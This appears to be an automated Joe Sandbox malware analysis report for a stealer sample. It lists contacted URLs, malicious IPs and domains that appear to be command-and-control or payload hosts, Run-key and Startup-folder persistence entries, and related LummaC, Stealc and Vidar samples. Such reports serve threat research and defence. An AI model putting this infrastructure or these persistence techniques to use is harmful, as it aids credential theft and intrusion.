https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://yalubluseks.eu	LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002908000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://49.12.197.9/C:	RegAsm.exe, 00000010.00000002.2705735289.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://go.microsoft.cr	userDHDAFBFCFH.exe, 00000034.00000002.2635142614.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://iplogger.org:443/1nhuM4.js	RegAsm.exe, 00000005.00000002.1882907666.0000000003B00000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	RegAsm.exe, 0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000044F000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cowod.KKFCAKEBKJKK	RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll5	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io/	RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll_J	RegAsm.exe, 0000000F.00000002.2327203276.000000000112D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/recaptcha/	RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://yalubluseks.eu/get_filT6	LKMService.exe, 00000001.00000002.4135113004.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/c4754d4f680ead72.phpy)SP	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cowod.hoptoKEBKJKK	RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://41.216.188.190/api/wp-ping.php&	RegAsm.exe, 00000005.00000002.1881533785.0000000001391000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://49.12.197.9/vcruntime140.dllz	RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/https://ipgeolocation.io/::	596a8ed0706146e48ded9036d0de8611.exe, 00000003.00000002.1765423290.00000000040D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ac.ecop	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869o	RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/8	RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io:443/widget/demo/8.46.123.33	RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://49.12.197.9s.exe	RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://41.216.188.190:80/api/wp-ping.php	RegAsm.exe, 00000005.00000002.1881533785.0000000001391000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://absorptioniw.site/apiw	RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dllK	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://46.8.231.109/1309cdeb8f4c8736/nss3.dll;	RegAsm.exe, 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://iplogger.org/	RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://yalubluseks.eu/receive.phpT	LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.ipify8	LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://41.216.188.190/api/wp-admin.php)P	RegAsm.exe, 00000005.00000002.1882907666.0000000003B05000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll_	RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gravvitywio.store/Y?P	RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ipgeolocation.io/	RegAsm.exe	false		unknown
https://steamcommunity.com/R	RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://broadcast.st.dl.eccdnx.com	RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://41.216.188.190/api/wp-ping.php	RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://41.216.188.190/api/wp-ping.phpy	RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/c4754d4f680ead72.phpnu=	RegAsm.exe, 0000002D.00000002.2984290523.00000000277E8000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.8.231.109	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	true
49.12.197.9	unknown	Germany	24940	HETZNER-ASDE	true
104.21.17.174	absorptioniw.site	United States	13335	CLOUDFLARENETUS	true
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
172.67.195.67	mysterisop.site	United States	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
104.21.56.150	abnomalrkmu.site	United States	13335	CLOUDFLARENETUS	true
104.26.2.46	iplogger.org	United States	13335	CLOUDFLARENETUS	false
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
104.21.84.18	treatynreit.site	United States	13335	CLOUDFLARENETUS	true
104.21.18.193	snarlypagowo.site	United States	13335	CLOUDFLARENETUS	true
41.216.188.190	unknown	South Africa	40676	AS40676US	false
104.237.62.213	api64.ipify.org	United States	18450	WEBNXUS	false
104.21.54.163	yalubluseks.eu	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	soldiefieop.site	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
172.67.208.141	questionsmw.store	United States	13335	CLOUDFLARENETUS	true
104.21.16.12	gravvitywio.store	United States	13335	CLOUDFLARENETUS	true
104.26.13.205	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523932
Start date and time:	2024-10-02 09:40:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	61
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@91/204@24/20
EGA Information:	Successful, ratio: 55.6%
HCA Information:	Successful, ratio: 90% Number of executed functions: 215 Number of non-executed functions: 48
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target GoogleUpdater.exe, PID 7556 because it is empty
Execution Graph export aborted for target LKMService.exe, PID 7500 because it is empty
Execution Graph export aborted for target LKMService.exe, PID 7928 because it is empty
Execution Graph export aborted for target file.exe, PID 7428 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:40:58	API Interceptor	5367275x Sleep call for process: LKMService.exe modified
03:40:58	API Interceptor	1x Sleep call for process: file.exe modified
03:41:28	API Interceptor	2x Sleep call for process: WerFault.exe modified
03:41:31	API Interceptor	5412780x Sleep call for process: GoogleUpdater.exe modified
03:41:33	API Interceptor	11x Sleep call for process: RegAsm.exe modified
08:41:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LKMService_59a59fb381b34871a4c71dd082707faa C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
08:41:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LKMService_59a59fb381b34871a4c71dd082707faa C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
08:41:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_21d4923aa73142a49be84ce8bde9060d.lnk
08:41:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cdd3441cf435451cafc80df0b052efb8.lnk
08:41:46	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1950dc17ab0f4160aae4b8a0fdba971c.lnk
08:41:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_08d9ba422859475badad9504b252ee54.lnk
08:42:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c44038cc60054eaa8813562842dfd4ff.lnk
08:42:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9f44457b6b99471191baae8958f10f64.lnk
08:42:45	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_536febaff0c14399b2a5f0a71f27abb5.lnk
08:42:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a370c7763f846c5add18054d5cf7e81.lnk
08:43:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_477fa627b0ea4f0980e7b4ad8bdab6e9.lnk
08:43:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f818ffdb9a594c0ba1e86f22b72d98d8.lnk
08:43:39	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_54f5f2685b40492081ed87241041e79e.lnk
08:43:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_53bca4c59bae4fb69d93994cf78f3af7.lnk
08:44:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6e9ab98f879846369d6c9a2b1b018d2a.lnk
08:44:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cad8a62bee4d4393b6527b6bf44c6070.lnk
08:44:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_732bf3e7b76642a5965b008549f0568b.lnk
08:44:45	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fb2dd1c4fbdb419ab877bf71a4fdad37.lnk
08:44:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3d076f96b7e74ba295f6f89a2d924622.lnk
08:45:11	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2868ba2c6c3d4a599d730cff5ae4a655.lnk
08:45:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_01f35b107e65410193c8f5874bca0c1d.lnk
08:45:37	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_270b53c0b508414ca42260f606197b27.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.8.231.109	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109/c4754d4f680ead72.php
49.12.197.9	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
104.21.17.174	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
treatynreit.site	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.184.196
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.84.18
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.84.18
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.184.196
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.18
iplogger.org	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.74.161
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	172.67.74.161
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	104.26.2.46
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	104.26.3.46
	gobEmOm5sr.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	104.26.2.46
	FileApp.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT	Browse	104.26.2.46
	kqS23MOytx.exe	Get hash	malicious	Socks5Systemz, Stealc, Vidar, XWorm, Xmrig	Browse	104.26.3.46
	abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe	Get hash	malicious	CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger	Browse	172.67.132.113
	ExeFile (331).exe	Get hash	malicious	Unknown	Browse	172.67.132.113
	ExeFile (71).exe	Get hash	malicious	Unknown	Browse	172.67.132.113
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
